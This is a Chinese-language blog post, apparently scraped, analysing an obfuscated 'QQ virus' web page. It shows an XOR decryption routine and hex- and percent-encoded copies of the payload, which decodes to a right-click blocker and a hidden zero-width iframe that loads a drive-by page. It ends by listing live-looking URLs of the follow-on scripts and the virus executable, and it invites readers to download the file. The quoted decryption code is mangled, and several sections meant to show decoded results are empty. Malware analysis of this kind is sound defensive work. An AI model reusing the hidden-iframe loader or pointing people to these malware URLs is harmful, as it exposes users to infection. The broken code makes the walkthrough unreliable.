关于一个QQ病毒网页的破解

来源：百度文库 编辑：神马文学网 时间：2024/07/08 08:20:52

---------------------------------完成-------------------------------------------------
解密第一段乱码 后的代码是：

之前加上
document.write(e(s));
然后保存，刷新。
有结果了吧：
function d(os){var key="DecryptIT";var ds;ds=‘;var kp,sp,s,kc,sc; kp=0;sp=0;while(sp126)) {s=String.fromCharCode(sc);}else{s=String.fromCharCode((sc^kc));} ds+=s;kp++;sp++;if(kp>=key.length)kp=0;}return ds;}
function di(s){s=d(s);document.write(unescape(m(s)));}
说明第二段代码已经解出。好好看看代码三，恩，又是一个调用，

=============================================
把那个乱码三赋给mm,然后用document.write(d(mm));来显示。
保存，刷新，看到了没？后面多了这么多
================================================
3C68746D6C3E0D0A3C62723E3C62723E3C7020616C69676E3D63656E7465723E3C666F6E742073697A653D313E506F776572656420627920456E637279707448544D4C3C2F666F6E743E3C2F703E3C736372697074206C616E67756167653D4A6176615363726970743E66756E6374696F6E20646D28297B72657475726E2066616C73653B7D2066756E6374696F6E2064702865297B696628652E77686963683D3D31297B773D77696E646F773B772E72656C656173654576656E7473284576656E742E4D4F5553454D4F5645293B772E6F6E6D6F7573656D6F76653D6E756C6C3B7D7D2066756E6374696F6E20646128297B7B616C6572742822546869732066756E6374696F6E2069732064697361626C65642E22293B72657475726E2066616C73653B7D7D2066756E6374696F6E2064642865297B696628652E77686963683D3D33297B72657475726E20646128293B7D7D202066756E6374696F6E20636D28297B68673D6576656E742E627574746F6E3B69662868673D3D327C7C68673D3D3329646128293B7D2020643D646F63756D656E743B773D77696E646F773B76633D642E616C6C3B71623D642E676574456C656D656E74427949643B20206966287663297B6966287162297B642E6F6E636F6E746578746D656E753D64613B642E6F6E73656C65637473746172743D646D7D656C73657B642E6F6E6D6F757365646F776E3D636D3B7D7D202069662871622626217663297B642E6F6E6D6F757365646F776E3D646D3B642E6F6E6D6F75736575703D64643B642E6F6E636F6E746578746D656E753D646D3B7D2020696628642E6C6179657273297B773D77696E646F773B772E636170747572654576656E7473286576656E742E4D4F55534555507C6576656E742E4D4F555345444F574E293B772E6F6E6D6F757365646F776E3D64643B772E6F6E6D6F75736575703D64703B7D3C2F7363726970743E3C2F626F64793E0D0A3C696672616D65207372633D3136383136383136384C36382E68746D2077696474683D30207765696768743D313E3C2F696672616D653E0D0A3C2F626F64793E0D0A3C2F68746D6C3E0D0A0D0A0D0A0D0A0D0A0D0A0D0A0D0A
============================================================
这就是第一次解密后的乱码三的结果，还是被加密了。分析刚刚解出的代码二的结果
有一句document.write(unescape(m(s)));
说明还要做一次unescap解密，但是在接密前还要调用一次m(s)函数。
好，继续
在我们刚刚加的东西后面再上
==============================================================================
var ww=‘3C68746D6C3E0D0A3C62723E3C62723E3C7020616C69676E3D63656E7465723E3C666F6E742073697A653D313E506F776572656420627920456E637279707448544D4C3C2F666F6E743E3C2F703E3C736372697074206C616E67756167653D4A6176615363726970743E66756E6374696F6E20646D28297B72657475726E2066616C73653B7D2066756E6374696F6E2064702865297B696628652E77686963683D3D31297B773D77696E646F773B772E72656C656173654576656E7473284576656E742E4D4F5553454D4F5645293B772E6F6E6D6F7573656D6F76653D6E756C6C3B7D7D2066756E6374696F6E20646128297B7B616C6572742822546869732066756E6374696F6E2069732064697361626C65642E22293B72657475726E2066616C73653B7D7D2066756E6374696F6E2064642865297B696628652E77686963683D3D33297B72657475726E20646128293B7D7D202066756E6374696F6E20636D28297B68673D6576656E742E627574746F6E3B69662868673D3D327C7C68673D3D3329646128293B7D2020643D646F63756D656E743B773D77696E646F773B76633D642E616C6C3B71623D642E676574456C656D656E74427949643B20206966287663297B6966287162297B642E6F6E636F6E746578746D656E753D64613B642E6F6E73656C65637473746172743D646D7D656C73657B642E6F6E6D6F757365646F776E3D636D3B7D7D202069662871622626217663297B642E6F6E6D6F757365646F776E3D646D3B642E6F6E6D6F75736575703D64643B642E6F6E636F6E746578746D656E753D646D3B7D2020696628642E6C6179657273297B773D77696E646F773B772E636170747572654576656E7473286576656E742E4D4F55534555507C6576656E742E4D4F555345444F574E293B772E6F6E6D6F757365646F776E3D64643B772E6F6E6D6F75736575703D64703B7D3C2F7363726970743E3C2F626F64793E0D0A3C696672616D65207372633D3136383136383136384C36382E68746D2077696474683D30207765696768743D313E3C2F696672616D653E0D0A3C2F626F64793E0D0A3C2F68746D6C3E0D0A0D0A0D0A0D0A0D0A0D0A0D0A0D0A‘
document.write(d(mm));
=======================================================================
保存，刷新，看到了吗？
又是一堆乱码出来了
================================================
3C%68%74%6D%6C%3E%0D%0A%3C%62%72%3E%3C%62%72%3E%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%66%6F%6E%74%20%73%69%7A%65%3D%31%3E%50%6F%77%65%72%65%64%20%62%79%20%45%6E%63%72%79%70%74%48%54%4D%4C%3C%2F%66%6F%6E%74%3E%3C%2F%70%3E%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%6E%20%64%6D%28%29%7B%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%7D%20%66%75%6E%63%74%69%6F%6E%20%64%70%28%65%29%7B%69%66%28%65%2E%77%68%69%63%68%3D%3D%31%29%7B%77%3D%77%69%6E%64%6F%77%3B%77%2E%72%65%6C%65%61%73%65%45%76%65%6E%74%73%28%45%76%65%6E%74%2E%4D%4F%55%53%45%4D%4F%56%45%29%3B%77%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%3D%6E%75%6C%6C%3B%7D%7D%20%66%75%6E%63%74%69%6F%6E%20%64%61%28%29%7B%7B%61%6C%65%72%74%28%22%54%68%69%73%20%66%75%6E%63%74%69%6F%6E%20%69%73%20%64%69%73%61%62%6C%65%64%2E%22%29%3B%72%65%74%75%72%6E%20%66%61%6C%73%65%3B%7D%7D%20%66%75%6E%63%74%69%6F%6E%20%64%64%28%65%29%7B%69%66%28%65%2E%77%68%69%63%68%3D%3D%33%29%7B%72%65%74%75%72%6E%20%64%61%28%29%3B%7D%7D%20%20%66%75%6E%63%74%69%6F%6E%20%63%6D%28%29%7B%68%67%3D%65%76%65%6E%74%2E%62%75%74%74%6F%6E%3B%69%66%28%68%67%3D%3D%32%7C%7C%68%67%3D%3D%33%29%64%61%28%29%3B%7D%20%20%64%3D%64%6F%63%75%6D%65%6E%74%3B%77%3D%77%69%6E%64%6F%77%3B%76%63%3D%64%2E%61%6C%6C%3B%71%62%3D%64%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%3B%20%20%69%66%28%76%63%29%7B%69%66%28%71%62%29%7B%64%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%64%61%3B%64%2E%6F%6E%73%65%6C%65%63%74%73%74%61%72%74%3D%64%6D%7D%65%6C%73%65%7B%64%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%63%6D%3B%7D%7D%20%20%69%66%28%71%62%26%26%21%76%63%29%7B%64%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%64%6D%3B%64%2E%6F%6E%6D%6F%75%73%65%75%70%3D%64%64%3B%64%2E%6F%6E%63%6F%6E%74%65%78%74%6D%65%6E%75%3D%64%6D%3B%7D%20%20%69%66%28%64%2E%6C%61%79%65%72%73%29%7B%77%3D%77%69%6E%64%6F%77%3B%77%2E%63%61%70%74%75%72%65%45%76%65%6E%74%73%28%65%76%65%6E%74%2E%4D%4F%55%53%45%55%50%7C%65%76%65%6E%74%2E%4D%4F%55%53%45%44%4F%57%4E%29%3B%77%2E%6F%6E%6D%6F%75%73%65%64%6F%77%6E%3D%64%64%3B%77%2E%6F%6E%6D%6F%75%73%65%75%70%3D%64%70%3B%7D%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E%0D%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%31%36%38%31%36%38%31%36%38%4C%36%38%2E%68%74%6D%20%77%69%64%74%68%3D%30%20%77%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%0D%0A%3C%2F%62%6F%64%79%3E%0D%0A%3C%2F%68%74%6D%6C%3E%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A
=================================================
然后这个就那去让刚刚哪个jiemi.htm来解密
乱码三最终结果：
=================================================

Powered by EncryptHTML

================================================================================
看到了吧，调用了168168168L68.htm这个页面，如果你不想感染的话，呵呵，别进去，但是怎么拿到他的源码呢？进到http://www.wayking.net/html/look.htm里面有专门查看某网址的源代码，这样你只是取得他的原代码，并没有运行，所以不会中毒了。
在http://www.wayking.net/html/look.htm里输入http://www.mtv68.com/68168168L68.htm
他是相对调用，所以要在68168168L68.htm前面加上http://www.mtv68.com
点“查看”
出来了吧，
=============================================


=====================================================
他还是在调用，http://www.newgao.com/666/mtv68.test和http://www.newgao.com/666/8/mtv68.test两个文件
继续在里面输入http://www.newgao.com/666/mtv68.test 点查看
======================================================================





===================================================================================
这个没什么，再看看http://www.newgao.com/666/8/mtv68.test，，还是点查看
==========================================================================





====================================================================
病毒可执行文件http://www.newgao.com/666/8/mtv68.exe
好了，用FLASHGET下载下来自己研究吧。再就不属于网页破解了。:)
我的网站：http://www.wayking.net
E---mail:wangweibd99@sohu.com